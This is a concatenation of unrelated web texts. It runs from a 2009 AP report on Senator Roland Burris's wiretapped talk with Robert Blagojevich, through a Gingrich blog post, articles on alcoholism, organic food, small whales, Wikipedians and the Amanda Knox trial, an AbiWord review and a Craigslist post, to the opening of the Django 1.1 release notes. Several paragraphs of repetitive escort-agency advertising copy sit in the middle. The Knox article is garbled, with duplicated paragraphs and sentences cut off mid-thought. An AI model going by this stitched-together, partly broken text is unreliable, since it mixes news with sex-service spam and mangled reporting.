CHICAGO ( AP )  Sen. Roland Burris promised to " personally do something " for Rod Blagojevich 's campaign fund while pressing for the then - Illinois governor to appoint him to President Obama 's former Senate seat , according to a wiretap transcript released Tuesday .
" Tell Rod to keep me in mind for that seat , would ya ? "
Burris tells Robert Blagojevich , who headed his brother 's campaign fund , in a Nov. 13 phone conversation secretly taped by the FBI .
The remark came after Robert Blagojevich urged Burris to " keep me in mind and you know if you guys can just write checks that 'd be fine , if we can't find a way for you to tie in . "
" Okay , okay , well we , we , I , I will personally do something , okay , " Burris says .
Earlier in the conversation , Burris and Robert Blagojevich explored the possibility that Burris might raise campaign money on a larger scale .
" I know I could give him a check , " Burris said .
" Myself . "
Burris repeatedly said he wanted to help but added that major fundraising would have " so many negative connotations that Burris is trying to buy an appointment from the governor . "
The transcript was released after U.S. District Chief Judge James F. Holderman approved making it available to the U.S. Senate ethics committee for its preliminary investigation of Burris 's appointment .
The new senator has been under intense scrutiny since he was appointed by the now - ousted governor in December , and for changing his story multiple times about whether he promised anything in exchange for it .
The ethics committee began a preliminary investigation into how Burris got his job , and the Sangamon County State 's Attorney was asked to determine whether perjury charges were warranted .
Burris opens the wiretapped conversation by telling Robert Blagojevich : " I know you 're calling telling me that you 're gonna make me king of the world .
" And therefore I can go off to , you know , wherever and do all these great things , " Burris adds .
He says that he has " been trying to figure out what the heck , you know , I can do . "
" We 've had a number of conversations about , you know , anything you might be able to do , " Robert Blagojevich says a moment later .
Burris says he is concerned about how fundraising on his part would be viewed if he got the Senate seat .
" And I 'm trying to figure out how to deal with this and still be in the consideration for the appointment , " he says .
" I hear ya , " says Robert Blagojevich .
" No , I hear ya . "
The then - governor was arrested Dec. 9 on charges of scheming to sell or trade the Senate seat Obama was vacating and using the political muscle of the governor 's office to squeeze people involved in state business for campaign contributions .
Blagojevich , ousted by lawmakers in January , and his brother have both pleaded not guilty in response to charges in the case as have four other members of the former governor 's inner circle .
Burris talks about taking part in a fundraising event that the Blagojevich campaign fund already has planned and says he is " wrestling with " what to do .
" I understand your concerns , ah , Roland , " Robert Blagojevich says .
" And God knows number one , I , I wanna help Rod , " Burris says .
" Number two , I also wanna , you know hope I get a consideration to get that appointment . "
Neither Robert Blagojevich 's attorney , Michael Ettinger , nor Wright objected to the government 's motion to give the tapes to the Senate .
Wright said Tuesday that Burris never wrote any checks to the Blagojevich campaign following the conversation .
" These transcripts verify the accuracy of my previous public statements on this matter and demonstrate once and for all there was no ' pay to play ' involved in my appointment to the United States Senate or perjury in my recounting of that process , " Burris said in a statement .
A spokesman for the U.S. attorney 's office , Randall Samborn , had no comment .
Indicted with both Blagojeviches were former campaign fund chairman Christopher G. Kelly , former chiefs of staff John Harris and Alonzo Monk and Springfield multimillionaire William Cellini .
All have pleaded not guilty , although Harris 's attorney says he is cooperating with federal prosecutors and Monk is believed to be as well .
Burris ' Senate appointment followed at least two phone conversations between Burris and Robert Blagojevich .
Burris told the Illinois House impeachment committee that he had promised nothing to Blagojevich in exchange for the seat but has changed his version of exactly what was said several times and questions have been raised about what happened .
U.S. Sen. Dick Durbin , D - Ill. , and Senate Majority Leader Harry Reid , D - Nev. , agreed to seat Burris if he gave a full accounting of his Blagojevich contacts to the Illinois House committee that considered impeachment of the governor .
Burris gave the committee an affidavit denying any discussion with Blagojevich 's aides before being offered the seat .
But when he testified , Burris acknowledged talking to one of Blagojevich 's friends and informal advisers about it .
Burris did not admit talking to anyone else and said he could not recall any other contacts .
Then , after he was sworn in , Burris released another affidavit acknowledging that he had talked to several Blagojevich advisers about his interest in the seat .
Soon after , talking to reporters , he said he had been asked to help raise campaign money for the governor and tried to find people willing to donate but failed .
Then he stopped answering questions , letting others speak on his behalf .
Copyright 2009 The Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten or redistributed .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
( h/t Bruce Wilson of TalkToAction )
Newt Gingrich is really playing up being a Catholic now and is warning Christians that " pagans " have us all surrounded and Satan is going to eat your baby unless you get involved in politics .
Former Speaker of the House Newt Gingrich and former presidential candidate Mike Huckabee urged Christians to get involved in politics to preserve the presence of religion in American life .
" I think this is one of the most critical moments in American history , " Gingrich said .
" We are living in a period where we are surrounded by paganism . "
They and other speakers warned about the continuing availability of abortion , the spread of gay rights , and attempts to remove religion from American public life and school history books .
Gingrich and Huckabee , a former governor of Arkansas , argued the rights of Americans stem from God and to ignore that connection is perilous .
The two were among several speakers , including former U.S. Senate candidate Oliver North , at the three - hour " Rediscovering God in America " event .
The event was closed to reporters but was broadcast live on God.TV , an evangelical Web site .
Running for the 2012 nomination is really getting to this man 's cranium because I do not see " virgins " being abducted while the pagan --- Devil worshippers are using them along with blood sacrifices anywhere , have you ?
By the third century CE , its meaning evolved to include all non-Christians .
Eventually , it became an evil term that implied the possibility of Satan worship .
The latter two meanings are still in widespread use today .
I do know that dressing up as a " witch " is still very popular for Halloween , so maybe that 's the big pagans ' plan to indoctrinate our young people into the occult .
If you asked most men what they thought would be popular features in the capital ’s top working girls , they ’d come out with all manner of exotic options .
From hair colours to race , it seems that fellas just want something different when they fork out their money .
That ’s the gut reaction , but it ’s also one that ’s not quite true .
There ’s nothing quite like our Central London escorts .
We know you might think that you ’ve seen it all , been there , done that , enjoyed the best delights that the capital has to offer when it comes to girls , but let us tell you , that ’s not the case .
Please look after this man would be a horribly cliched way to open this page , so we ’ll avoid it .
It ’s undeniably what people think of though , which to us is a bit of a problem .
People forget that the bear was named after the huge railway station that he was found in and not the other way around .
What this means , sadly , is that many end up misconstruing what the location is like and what its importance to the city of London really is .
It ’s not some fictional middle class suburb , or a place where a literary figure used to live : it ’s a transport hub .
When it comes down to it , there are few things in life more important than having fun .
When it comes to having fun in the capital , nowhere beats Central .
Oh we know , you might be taken in by all the lights and sounds on offer from the places on the outskirts .
They might say that the standards are rising and they definitely are .
Trust us , we know that you can have a good time outside of the fashionable postcodes .
When it comes down to it though , Zone 1 escorts and other activities are just a cut above everything else .
They ’re the creme de la creme , the absolute elite .
You ’re not going to find better elsewhere .
Ever since the summer games hit in 2012 , East London has been the place in terms of popularity .
Before that , it was n’t particularly well known or well loved due to a lack of refinement .
It was a place where a man would come for a fine East London escort , then leave as soon as he could , his mind filled with happiness from the lady but with little regard to where she worked
The very best HA escorts are girls that will blow you away .
We ’re talking about the sorts of babes that will make any man feel like he is lucky to be alive .
You know just the type we mean , and we ’re pleased to say that that sort of girl could be yours if you only pick up the phone .
Do that and you can enjoy some of the most stunning ladies in the city , the sort of truly sensational babes that will make even the most resolute of gents enjoy his time without reserve .
The kind of girl that can unlock the desires of each and every client with seeming ease .
There ’s never been anything like them in this city , and we ’re yet to see other agencies catch up .
There are few babes in all of the city that look quite as good as our outfit escorts .
When you first set eyes on one in the flesh , do n’t be surprised if you ’re take aback .
Their beauty is obvious even from these photos but in real life it ’s that much more breathtaking .
That such perfect woman can exist , can be such an impossibly high standard of good looking and yet still be available to you .
It boggles many minds and we frequently see our clients thanking their lucky stars when they first set eyes on their beauty of choice .
We ca n’t say that we blame them !
When it comes to seeing the very best South London escorts , can you really look any further than us ?
Anyone who knows the city or the industry will know that these babes are some of the very finest around , the sort of lady that can make any man feel weak at the knees .
And they can all be yours before you know it .
All you need to do to make that happen is to pick up the phone and give us a ring .
It really is that simple , so the question becomes , why have n’t you done it yet ?
Trust us when we say : it ’s going to be the ride of your life if you do .
That ’s why so many choose to come to V to find their lady of choice .
When it comes to seeing the best babes in all of the city , are there any ladies that can quite match the delights offered by the Ealing Common escorts ?
That ’s what we keep asking ourselves , and the answer always seems to be no .
It ’s hard to find ladies of this calibre at all , yet alone ones that are available to enjoy for the evening .
And once you start factoring cost into it all …
Let ’s just say that our babes are a rare and almost miraculous treat for those that know about them , fantasy made flesh for so many men .
Which is why we ’re always keen to see new clients trying them out .
If you ’re reading this , you ’re one of them .
You see , once a man has sampled an Ealing Common escort from our books for himself , he is n’t going to be needing any more convincing .
He ’ll know everything he needs to , and he ’ll skim through this on his way to book another babe every time .
So you ’re new , you ’re probably a little hesitant .
We could go on about it forever , but in reality all we need to say is just go for it .
Try one , and you ’ll soon see why we ’re such a popular agency .
The thing that seems to catch most people ’s eye about our Ealing Common escorts is n’t any one trait from one girl but rather the fact that we ’ve put together a whole gallery of beauties this good .
It really does boggle the mind to think that such an incredible collection of stunners is not only available for you tonight , but at a rate that you can afford .
There are few other agencies in the capital with even half our consistency , yet alone our reputation for perpetual excellence .
Never ever disappointed , that ’s our motto and it ’s one we stick to .
If a man has 100 experiences with an Ealing Common escort , most firms would say that having 97 or 98 be amazing is more than enough .
For us , it ’s not .
What if you ’re one of the unlucky 2 or 3 in 100 ?
You just get screwed over because the girl is normally better ?
No , for us that is not acceptable .
After all , you ’ve paid good money for the experience , so it needs to be good every single time .
Which is why the trait we value most in our ladies is consistency .
Judging by all the positive feedback we get from our girls , it ’s easy to say that you guys seem to value it too .
Online dating is an excellent way to meet someone , and the following tips will help to ensure you can cope with this new world of digital dating .
I 'm sure it sounds familiar but different , like a whole new world of possibility .
Let ’s be honest , when it comes to seeing the best girls , we could rant and rave about how sensational our ladies are all day and you ’d still not care .
After all , every agency claims their girls are the best , so what can you really judge it on ?
Do you have to just take the plunge and hope ?
Well no , thankfully .
For starters you can look at the sensational babes on this page and realise that we have some of the most beautiful Notting Hill escorts around , girls that no other agency has come close to matching .
There ’s some serious talent on here , make no mistake .
There are few men in the city who could resist an evening with a gorgeous Piccadilly Circus escort , that ’s for sure .
You might think that you could , think that you ’re better than that or that you can get one of those girls on your own .
The question is : why ?
What we mean is , why bother ?
It ’s so much hassle , stress and general misery to get a truly elite girl to give you her company , some sort of twisted prize that only comes to those that splash the most cash , flaunt themselves in the most ridiculous ways and are willing to chase day and night .
Were that the only way to get ahold of a beauty then we might understand .
A dream for most , but not for you .
No , you have a chance to have that sort of girl .
It ’s amazing is n’t it ?
It ’s enough to make most men gasp with sheer joy , and it can be yours if you just call us tonight .
It really is that simple to enjoy the very best babes that the city has to offer , so do n’t delay .
Call us tonight and see that when it comes to women , we ’re not playing around .
Our escorts in Chiswick Park are going to blow you away .
Prepare to enjoy some of the best babes in all of the city .
Girls that turn heads and blow minds for a living , the kind of companion that every man dreams of .
When you want a European escort that can really make your head spin , then you know exactly where to come , the perfect place to find the perfect babes .
When it comes to seeing the very best babes in all of the city , you really need to look no further .
After all , these truly excellent ladies have all the skills needed to blow the competition away , the sort of intensity that will make any guy feel like he is on top of the world .
As one of the biggest and best agencies in all of the city , we see a lot of girls .
So when we say that a group is special , we really do mean it .
We ’re giving our expert opinion .
Our cheap escorts are special .
When it comes to seeing the very best babes in all of the city , you really need to look no further .
After all , these truly excellent babes have all the skills needed to blow the competition away , the sort of intensity that will make any guy feel like he is on top of the world .
You might be amazed by just how high the quality of our babes is , after all , we really do show every single other agency in the city how it ’s done .
It ’s just how things work with us .
Quality and perfection are the two things that we strive for in all of our Asian escorts in London .
So why not try one of these babes tonight ?
The experience is sure to be phenomenal
When you see our names next to theirs , you know that the experience is going to be unforgettable , that the girls are going to be so good that no man is going to be able to resist .
After all , these sensational ladies are the elite , the sort of stunners that every man dreams of being able to enjoy .
You can be one of the lucky ones , all you have to do is pick up the phone and make the call .
It really is that easy .
After work every day you either go to the pub or return home to crack open a bottle of wine .
Twice a week you might drink so much alcohol that you suffer memory loss .
You spend much of your time boozing , or planning how you are going to become inebriated .
The morning after a hardy session of knocking back shots and downing pints , you go to work as normal , battling with little more than the dehydration , headaches and muscle ache of an average hangover .
If this sounds like a conventional seven - day period to you then you could well need to seek medical help .
It might seem like the opposite of the stereotypical image of a problem drinker , but high - functioning alcoholism – addiction to alcohol which seems to have no adverse effects on a person 's day - to - day professional life – is a significant national problem .
In 2007 , the most recent statistics available , 33 per cent of men and 16 per cent of women ( 24 per cent of adults ) were classified as hazardous drinkers by the NHS .
Among adults aged 16 to 74 , nine per cent of men and four per cent of women showed some signs of alcohol dependence .
A large proportion of these people are likely to be suffering from high - functioning alcoholism .
Boston - based Sarah Allen Benton is hardly your stereotypical alcoholic .
She has a masters from Northeastern University , also in Boston , and is a licensed mental - health counsellor at the city 's Emmanuel College .
In recovery from alcoholism for the past five years , her book , Understanding the High - Functioning Alcoholic , published in the US in March , tells of her descent into alcoholism and her subsequent recovery .
Benton estimates that at least 50 per cent of all alcoholics are high - functioning types .
Download the new Independent Premium app Sharing the full story , not just the headlines
" I started drinking at 14 , socially , at a party , " Benton says .
" From the beginning I experienced blackouts and memory lapses .
When I did drink I had a problem controlling the intake .
I was a binge drinker . "
The counsellor says that when she moved to college the habit continued , though she had no trouble attending classes on time or achieving good grades .
" On the outside , things were looking good , " she continues .
" But when I drank I would do things which were against my ethics and morals .
I did n't think I was an alcoholic , though – I thought that was just old men drinking out of brown paper bags in the street . "
The author says her drinking – which she says , she regarded as a reward for a hard day 's work , much like anybody else – continued when she started to pursue a career in television production .
" I would vomit , I would lose my memory .
I would not remember how I got home , and my friends would have to tell me .
But I would never let a hangover get in the way of me going to work . "
A high - functioning alcoholic ( HFA ) is clinically defined as someone who is able to maintain their " outside life " – such as job , home , family and friendships , all while drinking alcoholically .
HFAs have the same disease as " skid-row " alcoholics , but the disease manifests itself differently .
Many HFAs are not viewed by society as being alcoholic because they have succeeded in their careers and personal lives .
These achievements often lead the HFAs to deny they have a problem ; they are less likely to feel they need treatment for alcoholism , and may slide through the cracks in the healthcare system because they are not diagnosed .
Additionally , problems with alcohol withdrawal are usually a major tell - tale sign during the diagnosis for alcohol dependence ; many HFAs are neither daily drinkers nor physically addicted to alcohol .
According to Alcoholics Anonymous , it is easier to characterise in other ways .
Such as , for example , when an individual experiences a craving for drink , or when someone behaves out of character when inebriated .
The risks involved in being an HFA may include dangerous behaviours such as drinking and driving , having risky sexual encounters , or blacking out .
Benton says she ultimately managed to wean herself off alcohol by enrolling in a recovery programme similar to Alcoholics Anonymous .
" It 's vital to have a social support system which might feature therapy at times , " she says .
" Weaning yourself off alcohol can also be accompanied by anxiety and depression , and these need to be treated .
I have n't had a drink in five years .
The most important step I went through was accepting that I might be an alcoholic , despite contradicting the conventional stereotype . "
Her advice is simple .
" I would say : try to control it .
Try to set goals or limit the number of drinks you have in an evening .
See if you can adhere to those limits .
I could n't , even for a couple of days , and would return to my old ways .
I needed treatment , and many people are in a similar situation – missing out on important life lessons because they only know how to deal with things through drink .
People in dead marriages , for example .
It gives people a false sense of security and prevents them from addressing other problems . "
High - functioning alcoholism : the signs
* You have trouble controlling your intake even after deciding that you will drink no more than a given amount .
* You find yourself thinking obsessively about drinking — when and where and with whom you will drink next .
* When you drink , you behave in ways that are uncharacteristic of your sober self .
* You experience blackouts , and are unable to remember what took place during a drinking bout .
AbiWord - the underestimated word processor
Updated : June 5 , 2009
When someone tells you to name a word processor , you 'll most likely say Microsoft Word , maybe OpenOffice Write , seldom WordPerfect , but almost never AbiWord .
This little tools seems to avoid the spotlight , which is a shame , because it 's a beautiful , powerful word processor that you should definitely be using .
Not only can this 25 MB word processor do what its bigger , heavier , slower brothers are capable of , it also has many useful features that you will not find in these bigger , heavier and slower programs .
Take a moment or two , lean back and read on why AbiWord should be one of your first choices when it comes to word processing .
AbiWord is cross-platform
AbiWord runs on major operating systems , including Linux , Windows and Mac .
It also has good international language support .
It works well with right - to - left languages , like Arabic or Hebrew .
AbiWord also has a portable version for Windows .
File formats
AbiWord supports a staggering range of file formats .
It can both read and write files in its native form , MS documents , including the dubious MS Word 2007 Office Open XML ( DOCX ) , PDF , OpenOffice , LaTeX , KWord , PostScript ( PS ) , even Outlook mail , and many others .
Equation editor
AbiWord does not make pretenses when it comes to equations .
It does not have a multi-button menu like the MS Equation Editor .
Instead , it offers a simple text editor where you input formulas in LaTeX format .
This does require being able to write equations in LaTeX format , but it 's much simpler and tremendously faster than using the visual equation tools .
For more details on LaTeX and why it 's preferable than conventional methods when it comes to document mathematics , you may want to read my LaTeX - the way documents are meant to be written article .
Speaking of LaTeX ...
AbiWord supports Computer Modern fonts !
This is unbelievable .
Neither MS Word nor OpenOffice Writer can do this without extensive modifications .
Without any hacks , AbiWord allows you to write documents using the professional , incomparably beautiful Computer Modern fonts .
If you 're not a LaTeX fan or do n't feel like installing 250 MB of libraries , let alone mastering the LaTeX syntax , this is a simple trick that will let you create supreme - looking documents .
For quick and dirty tasks , when you might not be able to afford using the big , fully featured LyX or Kile text processors , AbiWord is ideal , especially if ran from a USB stick .
Styling
AbiWord is all about separating content from styles , in other words , working the right way .
Like its bigger competition , AbiWord features a powerful styling menu .
Then , there 's the Stylist , a utility to quickly switch between style categories .
Plugins
AbiWord is highly extensible .
It has a rich and powerful plugin functionality , which significantly extends its basic use .
For instance , AbiWord can import WordPerfect documents or graphics , view SVG graphics , work with Palm database files , and more .
Take a look at the following list for a detailed overview of available plugins .
Scripting
AbiWord supports scripts .
Even better , you can run AbiWord from the command line .
This is particularly useful when you want to run batch jobs , like converting documents , merging mail or creating templates .
Other stuff
AbiWord has many other cool features .
For example , it integrates nicely into the online word .
While working on your documents , you may need access to additional , external sources of information .
For instance , you may want to edit images via GIMP ( if installed ) , run a Google search , wiki an entry , use several different dictionaries to check the meaning of words and phrases , or translate documents .
AbiWord also has a presentation mode , allowing to view your document as a sort of a slide show , again a unique feature you wo n't easily find elsewhere .
Conclusion
AbiWord is small , light , fast , free , cross-platform , portable , and will do everything you need , including unbelievable perks like equations in LaTeX , Computer Modern fonts or the presentation mode .
It also supports many file formats , like DOCX , and right - to - left languages .
All that in modest 25 MB of space , either on Windows , Linux or Mac .
Sounds like a definite keeper .
If you 're not looking for a full - blown office suite , require portability and flexibility and like to work smartly and efficiently , without being restricted by the choice of file formats or fonts , AbiWord is an ideal solution to your needs .
Go ahead and grab it .
You wo n't be disappointed .
Cheers .
Organic vegetables are shown at a Whole Foods Market in LaJolla , California in this May 13 , 2008 file photo .
REUTERS / Mike Blake
LONDON ( Reuters ) - Organic food has no nutritional or health benefits over ordinary food , according to a major study published Wednesday .
Researchers from the London School of Hygiene & Tropical Medicine said consumers were paying higher prices for organic food because of its perceived health benefits , creating a global organic market worth an estimated $ 48 billion in 2007 .
A systematic review of 162 scientific papers published in the scientific literature over the last 50 years , however , found there was no significant difference .
“ A small number of differences in nutrient content were found to exist between organically and conventionally produced foodstuffs , but these are unlikely to be of any public health relevance , ” said Alan Dangour , one of the report ’s authors .
“ Our review indicates that there is currently no evidence to support the selection of organically over conventionally produced foods on the basis of nutritional superiority . ”
The results of research , which was commissioned by the British government ’s Food Standards Agency , were published in the American Journal of Clinical Nutrition .
Sales of organic food have fallen in some markets , including Britain , as recession has led consumers to cut back on purchases .
The Soil Association said in April that growth in sales of organic products in Britain slowed to just 1.7 percent in 2008 , well below the average annual growth rate of 26 percent over the last decade , following a plunge in demand at the end of the year .
QR Code Link to This Post
Location : Upper East Side
it 's NOT ok to contact this poster with services or other commercial interests
I have not cut my hair since age 14 .
I am 5 ' 8 " and my nut - brown locks fall well past the small of my back , terminating just below the buttocks .
I am 32 years old but often get i.d.'d when i buy wine spritzer by the case .
I work in elder - care , and several of my male charges have described me as both " comely " and a " handsome woman . "
I used to permit these fellows to brush my hair until i was reprimanded by my superiors .
This is how the " grooming circle " works .
I will distribute to each man a numbered brush from my array of fine boar 's head bristle brushes ( 2 have ivory handles , 4 have tortoise shell ) .
Each man will gather around me and take hold of a lock of hair approx 1 /4 inch in diameter .
Each man will then spread out from me in what i refer to as the " maypole formation . "
I will let out a long sigh as a signal to commence brushing in tandem .
I may need to periodically give notes , and will refer to each man by brush number .
No Tugging .
Please do not suggest music .
We will be listening to the Gypsy Kings .
We will all be clothed .
This is not overtly sexual in nature .
You may take off your shoes but not your socks .
All I require is that you be of sound mind , have clean finger nails , no callouses , and a steady hand .
A steady hand is essential to proper brushing rythmn .
For those first - timers who have never participated in a " grooming circle " before and are feeling nervous , I will offer you a ladyfinger soaked in peach schnopps to calm you .
I also have wine spritzer if that is more to your taste .
Again , there is nothing so offputting as an unsteady hand .
I will provide refreshments afterwords : ginger snaps , necco wafers , and fresca .
Do not bring in any outside brushes .
Please email me your responses and a photo of your hands .
-- LilyPS
I have no grey hairs ( at least not on my head ) .
Madeira , Portugal : Small whales are disappearing from the world 's oceans and waterways as they fall victim to fishing gear , pollution , and habitat loss – compounded by a lack of conservation measures such as those developed for great whales , according to a new WWF report .
Small cetaceans :
The Forgotten Whales , released today , states that inadequate conservation measures are pushing small cetaceans – such as dolphins , porpoises and small whales – toward extinction as their survival is overshadowed by efforts to save their larger cousins .
" Although great whale species of the world are by no means secure and still require conservation attention , the situation is just as critical for these smaller , seemingly forgotten species , " said Dr. Susan Lieberman , Director of the Species Programme for WWF - International .
While great whales are now protected ( to an extent ) by the international commercial whaling moratorium , in effect since 1986 , small cetacean hunts continue around the globe , largely unmanaged and unchecked by the international community .
For example , the hunt of 16,000 Dall 's porpoises every year in Japan is considered unsustainable .
Yet several of the pro-whaling nations taking part in the International Whaling Commission ( IWC ) meeting this week object to discussing small cetacean conservation .
" It is time for the IWC and its members to take full responsibility for the conservation future of all whales great and small .
The IWC – and the world - must not ignore the small whales of our planet until it is too late , " said Dr. Lieberman .
A significant disadvantage smaller whale species face compared to great whales is a crippling lack of data on their numbers and habits .
Forty of the 69 small cetacean species , or 58 percent , are classified by IUCN as ' data deficient ' , meaning that there is not enough information available to even determine whether they are threatened or not .
" It must never be assumed that " Data Deficient " means that the species is out of danger — rather , it means that the world 's top scientists just do n't know , " the report says .
Only four out of 15 Species , or 27 percent , of great whales are listed as data deficient , even though many of the reasons why smaller whale species are difficult to study also apply to the great whales .
According to the IUCN Red List , population trends – whether the species is increasing or decreasing in number – are unknown for 60 of the 69 small cetacean species .
The nine remaining species are in decline .
Great whales also have more protection in international conservation efforts .
Almost all great whale species , for example , have the strongest level of protection offered by CITES – a conservation convention which regulates international trade in protected wildlife species – compared to just 17 percent of dolphin and porpoises species .
In addition , the Convention on Migratory Species ( CMS ) protects 87 percent of great whale species , but less than half of smaller whale species .
Small cetaceans fulfill a critical role in their environment , stabilising and ensuring a healthy and productive ecosystem .
They also are part of the highly profitable whale and dolphin watching industry worldwide , which generates over US $ 1.5 billion each year .
" If small cetaceans are not central to negotiations on current whaling , it is possible that conservation successes achieved for great whales could simply result in a shift of problems from great whales to small cetaceans , " the report states .
Source : World Wildlife Fund
Adding names together , common after marriage , has a limit in Germany
Germany 's highest court has upheld a law which makes it illegal for anyone to use more than two last names .
A married couple challenged the 1993 law after they were forbidden from joining their surnames - one of which is already a double - barrelled name .
Frieda Rosemarie
Thalheim married Hans - Peter Kunz - Hallstein in 1997 but both had wanted to retain their surnames .
The court ruled surnames made of three or more different names made it more difficult to trace back a family line .
After the ruling , Hans - Peter Kunz - Hallstein told the BBC he and his wife were disappointed .
" We 're married , " he said , " and we want to show it . "
Australian Wikipedians have hit out at a report which found they were egocentric , disagreeable , socially awkward and closed to new ideas .
The public perception of Wikipedia editors and moderators is that they are an altruistic group of bright sparks who volunteer their time to expand the world 's knowledge , but a study by Israeli psychology researchers found " the prosocial behaviour apparent in Wikipedia is primarily connected to egocentric motives ... which are not associated with high levels of agreeableness " .
The study , published in the journal CyberPsychology and Behaviour , gave personality tests to 69 active members of the free encyclopedia that anyone can edit and 70 non-Wikipedians , finding the former " feel more comfortable expressing themselves on the net than they do offline " .
The researchers ' findings that Wikipedians were introverted , disagreeable and closed to new ideas is at odds with the notion that Wikipedia was built around community and knowledge sharing .
This was partly confirmed by Australian Wikipedia admin Andrew , who does n't want his surname published but goes by the online handle Orderinchaos .
He said many discussions between moderators about the site 's policies resulted in " intractably opposed contributors , many with vested interests , slugging it out to the death " .
He also said the site had " a slightly pro-academic bias " and " any serious proposals for change usually get defeated by the community , which is now realistically too big to speak with a united voice on almost any subject " .
But Daniel Bryant , one of the most senior Wikipedia administrators in Australia , noted the study only surveyed Israeli users and said the Australian Wikipedia community had a different culture from other national groups .
" I may be biased in this assessment , but I 'd go as far as to say that we are likely in the top echelon of countries for Wikipedians who have what could be described as a `normal ' social standing and a `normal ' real life , " he said .
" I do n't think [ the study ] accurately reflects Australian Wikipedians nearly as well as it does the Wikipedia community 's general population . "
Andrew agreed with this assessment , saying " Australian Wikipedia is one of the oases of relative calm on Wikipedia generally " .
He noted that only one disputed Australian article ever made it to Wikipedia 's Arbitration Committee .
Lead researcher Yair Amichai - Hamburger , of the Sammy Ofer School of Communication , told New Scientist that Wikipedia users were " compensating " and contributing to the site was " their way to have a voice in this world " .
Similarly , last year , Hewlett - Packard researchers analysed the habits of 580,000 YouTube contributors and found that people who regularly uploaded material were attention seekers with egocentric motives .
But Bryant said : " Established Australian Wikipedians are some of the most well - connected in real life , both as members of the education and information revolution , and also socially . "
Trial of Amanda Knox Continues with College Friends ’ Support By By Carol Forsloff Jul 2 , 2009 in Crime
The young woman on trial in Italy for murdering her housemate continues to plead innocence as family and friends support her .
The Amanda Knox trial continues to raise controversy at the time Knox would have graduated from college .
The Knox has claimed she stayed the night at Sollecito ’s apartment where the two smoked marijuana and had sex on the night Kercher was killed .
In her testimony Knox was reported to have been somewhat rattled during questioning but that she continued to assert her innocence and to claim “ police treated her brutally during questioning , that they hit her on the head , and continued to demand answers .
Knox explains this as the reason she has given accounts of what happened the night of Kercher ’s death .
Knox 's parents continue to support their daughter , even as Knox told the court her accusation of Diya " Patrick " Lumumba as being the killer came as a result of police pressure .
Lumumba was held just briefly by police , then cleared and released .
Police deny they did anything improper during the investigation even as Knox repeated her accusation of it during questioning by lead prosecutor Giuliano Mignini .
The prosecution in this case believe a kitchen knife found at Sollecito ’s apartment was the murder weapon and claim Sollecito held Kercher from behind while Guede tried to assault her , and then Knox stabled Kercher in the throat .
Defense attorneys contend the Knox ’s college friends have been named as witnesses and some have been interviewed in the United States , declaring Knox to have been a good person and good student , although Knox ’s friend , As Knox and her allies continue to defend the young woman at a murder trial in Italy , this is the time she would have graduated from college at the University of Washington .
It is a particularly poignant time for friends who are giving their support and relating details in Seattle newspapers .
It is also a time when friends and family continue to memorialize Knox is on trial for killing her housemate Meredith Kercher in what has been described as a sex game in 2007 .
Her then boyfriend .
Raffaele Sollecito , whom she had known for a very short time before the described event , is also on trial for allegedly participating in the killing .
Rudy Hermann Guede , another defendant , has already been convicted of the murder despite his denial of involvement .
The trial of Amanda Knox , 21 , a Seattle University of Washington student , continued in Perugia , a small town in Italy , as her parents and friends have also testified .
Knox herself was also on the stand in her own defense during the past month .
She has continued to deny the killing of Kercher , originally declaring a man named Diya " Patrick " Lumumba was guilty .
Later she recanted the story , saying that she had said this under pressure from police .
Knox has claimed she stayed the night at Sollecito ’s apartment where the two smoked marijuana and had sex on the night Kercher was killed .
In her testimony Knox was reported to have been somewhat rattled during questioning but that she continued to assert her innocence and to claim “ police treated her brutally during questioning , that they hit her on the head , and continued to demand answers .
Knox explains this as the reason she has given accounts of what happened the night of Kercher ’s death .
Knox 's parents continue to support their daughter , even as Knox told the court her accusation of Diya " Patrick " Lumumba as being the killer came as a result of police pressure .
Lumumba was held just briefly by police , then cleared and released .
Police deny they did anything improper during the investigation even as Knox repeated her accusation of it during questioning by lead prosecutor Giuliano Mignini .
The prosecution in this case believe a kitchen knife found at Sollecito ’s apartment was the murder weapon and claim Sollecito held Kercher from behind while Guede tried to assault her , and then Knox stabled Kercher in the throat .
Defense attorneys contend the murder of Miss Kercher was similar to burglaries committed by Rudy Guede , 22 , described as a jobless drifter from the Ivory Coast .
Guede , found guilty in a separate trial in October 2008 , was sentenced to 30 years .
Prosecuting attorneys on the other hand maintain that all three defendants , Knox , Sollecito and Guede acted together in killing Kercher .
Knox ’s college friends have been named as witnesses and some have been interviewed in the United States , declaring Knox to have been a good person and good student , although Knox ’s friend , Andrew Seliber , did say at one time she was given a citation for noise violation from music at a party in her home .
One friend weighed in on national television , as she appeared in Italy to give character witness , to underline Knox ’s good character .
Supporters in Seattle continue to solicit funds for Knox ’s defense and have a website devoted to helping raise money to help Knox , whom they continue to claim was an honor student of good character .
Time magazine asks the question “ How strong is the case against Amanda Knox ? ” in its June edition , now online .
The magazine relates the details of the case , then interviews attorney Anne Bremner , working pro bono with supporters of Knox .
Bremner told
Time the evidence was mostly circumstantial and maintains the knife cited as the murder weapon does n’t match the outline on a sheet found at the crime scene .
As Knox and her allies continue to defend the young woman at a murder trial in Italy , this is the time she would have graduated from college at the University of Washington .
It is a particularly poignant time for friends who are giving their support and relating details in Seattle newspapers .
It is also a time when friends and family continue to memorialize Meredith Kercher while the case of Amanda Knox continues to be headlines in Italian tabloids and other newspapers in Europe .
More about Amanda knox , Meredith kercher , Murder trial italy More news from amanda knox meredith kercher murder trial italy
Related Survey
Beer seems to be on the agenda for Thursday evening 's bury - the - hatchet White House meeting between Harvard professor Henry Louis Gates Jr. and Cambridge Police Sergeant Joseph Crowley .
Gates and Crowley have their favorites , and so does President Obama , according to White House spokesman Robert Gibbs .
Here they are , along with a few choice brews of other luminaries .
What would you choose ?
Click to the end of the gallery to vote for what you would drink at the White House .
July 29 , 2009
Welcome to Django 1.1 !
Django 1.1 includes a number of nifty new features , lots of bug fixes , and an easy upgrade path from Django 1.0 .
Backwards - incompatible changes in 1.1 ¶
Django has a policy of API stability .
This means that , in general , code you develop against Django 1.0 should continue to work against 1.1 unchanged .
However , we do sometimes make backwards - incompatible changes if they ’re necessary to resolve bugs , and there are a handful of such ( minor ) changes between Django 1.0 and Django 1.1 .
Before upgrading to Django 1.1 you should double - check that the following changes do n’t impact you , and upgrade your code if they do .
